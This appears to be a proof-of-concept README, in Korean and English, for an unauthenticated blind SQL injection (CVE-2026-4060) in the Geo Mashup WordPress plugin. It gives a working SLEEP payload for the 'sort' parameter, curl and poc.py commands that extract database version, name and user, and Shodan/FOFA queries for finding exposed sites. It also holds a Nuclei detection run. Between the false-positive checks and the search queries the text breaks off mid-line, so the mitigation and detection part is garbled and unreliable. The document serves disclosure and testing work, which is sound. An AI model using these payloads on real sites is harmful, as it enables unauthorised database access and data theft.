Share
## https://sploitus.com/exploit?id=EBC57F95-FCBC-5E72-B5F4-3C5722E51463
# CVE-2026-4060 β€” Geo Mashup ≀ 1.13.18 Unauthenticated SQL Injection PoC

![Severity](https://img.shields.io/badge/Severity-High-red)
![CVSS](https://img.shields.io/badge/CVSS-7.5-orange)
![Type](https://img.shields.io/badge/Type-SQLi%20(Time--Based%20Blind)-blue)
![Status](https://img.shields.io/badge/Status-Patched%20in%201.13.19-green)

> **Unauthenticated** attackers can inject arbitrary SQL into the `ORDER BY` clause via the `sort` parameter of the Geo Mashup `render-map` endpoint, enabling time-based blind extraction of sensitive database information.

---

## Table of Contents

- [Vulnerability Overview](#vulnerability-overview)
- [ν…ŒμŠ€νŠΈ ν™˜κ²½](#ν…ŒμŠ€νŠΈ-ν™˜κ²½-test-environment)
- [ν…ŒμŠ€νŠΈ μ‹€ν–‰ 방법](#ν…ŒμŠ€νŠΈ-μ‹€ν–‰-방법-how-to-run)
- [ν…ŒμŠ€νŠΈ κ²°κ³Ό](#ν…ŒμŠ€νŠΈ-κ²°κ³Ό-test-results)
- [Mitigation](#mitigation)
- [Detection](#detection)
- [Timeline](#timeline)
- [References](#references)

---

## Vulnerability Overview

| Field | Detail |
|-------|--------|
| **CVE** | CVE-2026-4060 |
| **Plugin** | [Geo Mashup](https://wordpress.org/plugins/geo-mashup/) by cyberhobo |
| **Affected** | ≀ 1.13.18 |
| **Fixed in** | 1.13.19 |
| **CVSS v3.1** | 7.5 (High) β€” `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` |
| **CWE** | [CWE-89](https://cwe.mitre.org/data/definitions/89.html) β€” Improper Neutralization of Special Elements in SQL |
| **Auth required** | None (Unauthenticated) |

### Technical Detail

The `sort` parameter accepted by the `render-map` endpoint is passed directly into a `$wpdb->get_results()` call without sanitization:

```php
// render-map.php (simplified)
$sort = $_GET['sort'];
$results = $wpdb->get_results(
    "SELECT ... FROM wp_geo_mashup_locations ... ORDER BY $sort"
);
```

Because `$sort` is interpolated as-is, an attacker can inject a subquery into the `ORDER BY` clause. WordPress's `wpdb` escapes single quotes, so the PoC uses `ORD(SUBSTRING(...))` with numeric comparisons to bypass this restriction and perform time-based blind extraction.

**Vulnerable endpoint:**
```
GET /?geo_mashup_content=render-map&map_content=global&sort=
```

---

## ν…ŒμŠ€νŠΈ ν™˜κ²½ (Test Environment)

| Component | Version |
|-----------|---------|
| OS | macOS (Darwin 25.4.0) |
| Docker | 27.x |
| WordPress | 6.8.2 (PHP 8.2, Apache) |
| MariaDB | 11.4 |
| Geo Mashup | **1.13.18** (vulnerable) |
| Python | 3.x (for `poc.py`) |
| Nuclei | v3.8.0 |

### Lab Architecture

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Host (localhost:8080)          β”‚
β”‚                                 β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚
β”‚  β”‚ WordPress   β”‚  β”‚ MariaDB  β”‚ β”‚
β”‚  β”‚ 6.8.2+PHP82 │──│  11.4   β”‚ β”‚
β”‚  β”‚ :80         β”‚  β”‚ :3306   β”‚ β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚
β”‚       + Geo Mashup 1.13.18      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

Geo Mashup 1.13.18 μ„€μΉ˜ 확인:

![Geo Mashup 1.13.18 active in WordPress admin](screenshots/01_plugin_installed.png)

---

## ν…ŒμŠ€νŠΈ μ‹€ν–‰ 방법 (How to Run)

### 1. μ·¨μ•½ ν™˜κ²½ ꡬ성

```bash
git clone https://github.com/ydking0911/CVE-2026-4060-PoC.git
cd CVE-2026-4060-PoC
bash setup.sh
```

`setup.sh`κ°€ μˆ˜ν–‰ν•˜λŠ” μž‘μ—…:
- WordPress 6.8.2 + MariaDB 11.4 μ»¨ν…Œμ΄λ„ˆ μ‹€ν–‰
- Geo Mashup **1.13.18** (μ·¨μ•½ 버전) μžλ™ μ„€μΉ˜ 및 ν™œμ„±ν™”
- 지도 μ—”λ“œν¬μΈνŠΈκ°€ 정상 μ‘λ‹΅ν•˜λ„λ‘ geo-tagged 포슀트 생성

μ™„λ£Œ ν›„ 접속:
- **Site:** `http://localhost:8080`
- **Admin:** `http://localhost:8080/wp-admin` (ID: `admin` / PW: `admin`)

### 2. 취약점 확인 (SLEEP Injection)

```bash
time curl -s -o /dev/null \
  "http://localhost:8080/?geo_mashup_content=render-map&map_content=global&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29"
```

응닡이 ~8초 μ§€μ—°λ˜λ©΄ `ORDER BY` 절 SQL Injection 확인.

### 3. 데이터 μΆ”μΆœ (PoC)

```bash
# κΈ°λ³Έ μ‹€ν–‰ (결과만 좜λ ₯)
python3 poc.py --url http://localhost:8080

# verbose λͺ¨λ“œ (payload β†’ 응닡 μ‹œκ°„ β†’ μΆ”μΆœ 문자 κ³Όμ • 좜λ ₯)
python3 poc.py --url http://localhost:8080 --verbose

# SQLi 쑴재 μ—¬λΆ€λ§Œ λΉ λ₯΄κ²Œ 확인
python3 poc.py --url http://localhost:8080 --confirm-only
```

### 4. Nuclei 탐지 ν…œν”Œλ¦Ώ μ‹€ν–‰

```bash
nuclei -t nuclei/CVE-2026-4060.yaml -u http://localhost:8080
```

### 5. ν™˜κ²½ μ’…λ£Œ

```bash
docker compose down -v
```

---

## ν…ŒμŠ€νŠΈ κ²°κ³Ό (Test Results)

### True Positive (TP) β€” μ·¨μ•½ν•œ λŒ€μƒ

#### TP-1: ORDER BY SLEEP(8) μ£Όμž… 성곡

`sort` νŒŒλΌλ―Έν„°μ— `SLEEP(8)` μ„œλΈŒμΏΌλ¦¬λ₯Ό μ£Όμž…ν•˜μ—¬ 응닡이 8초 지연됨을 확인.

```bash
time curl -s -o /dev/null \
  "http://localhost:8080/?...&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29"
```

![SLEEP(8) via ORDER BY β€” 8.05s response](screenshots/02_sleep_proof.png)

#### TP-2: 데이터 μΆ”μΆœ (verbose λͺ¨λ“œ)

`ORD(SUBSTRING(...))` 기반으둜 ν•œ κΈ€μžμ”© DB 정보λ₯Ό μΆ”μΆœν•˜λŠ” μ „ κ³Όμ •.  
payload 전솑 β†’ 응닡 μ‹œκ°„ μΈ‘μ • β†’ SLEEP λ°œμƒ μ‹œ ν•΄λ‹Ή 문자 ν™•μ •.

```bash
python3 poc.py --url http://localhost:8080 --verbose
```

![poc.py verbose β€” payload, timing, extracted chars](screenshots/04_poc_extraction.png)

**μΆ”μΆœλœ 정보:**

| Query | Result |
|-------|--------|
| `VERSION()` | `11.4.10-MariaDB` |
| `DATABASE()` | `wordpress` |
| `USER()` | `wordpress@172.23.0.3` |

#### TP-3: Nuclei ν…œν”Œλ¦Ώ 탐지

```
[CVE-2026-4060] [http] [high]
http://localhost:8080/?geo_mashup_content=render-map&map_content=global&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29

Scan completed in 8.07s. 1 matches found.
```

---

### False Positive (FP) β€” λΉ„μ·¨μ•½ λŒ€μƒ

Nuclei ν…œν”Œλ¦Ώμ€ 두 단계 flow둜 FPλ₯Ό λ°©μ§€ν•©λ‹ˆλ‹€.

#### FP-1: Geo Mashup λ―Έμ„€μΉ˜

Step 1μ—μ„œ `readme.txt` κ°€ 404λ₯Ό λ°˜ν™˜ν•˜λ©΄ μ¦‰μ‹œ μ’…λ£Œ. SQL payloadλŠ” μ „μ†‘λ˜μ§€ μ•ŠμŒ.

```
Scan completed in 62ms. 0 matches found.   βœ…
```

#### FP-2: 패치된 버전 (β‰₯ 1.13.19)

`readme.txt` 버전 확인:

![readme.txt showing Stable tag: 1.13.18](screenshots/03_plugin_version.png)

`compare_versions(version, '= 8s
```

**Shodan / FOFA:**

```
Shodan: http.html:"geo-mashup"
FOFA:   body="geo-mashup"
```

---

## Timeline

| Date | Event |
|------|-------|
| 2026-04 | 취약점 발견 |
| 2026-04 | ν”ŒλŸ¬κ·ΈμΈ 개발자 보고 |
| 2026-05 | Geo Mashup 1.13.19 패치 릴리즈 |
| 2026-05-14 | CVE ν• λ‹Ή 및 곡개 |

---

## References

- [NVD β€” CVE-2026-4060](https://nvd.nist.gov/vuln/detail/CVE-2026-4060)
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/id/2fa5ae9a-532c-40f9-b70a-217f0f9cd473?source=cve)
- [Plugin Changeset (fix)](https://plugins.trac.wordpress.org/changeset/3503627/)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)

---

## Disclaimer

This repository is for **educational and authorized security testing purposes only**.  
Do not use against systems you do not own or have explicit written permission to test.  
The author is not responsible for any misuse of this material.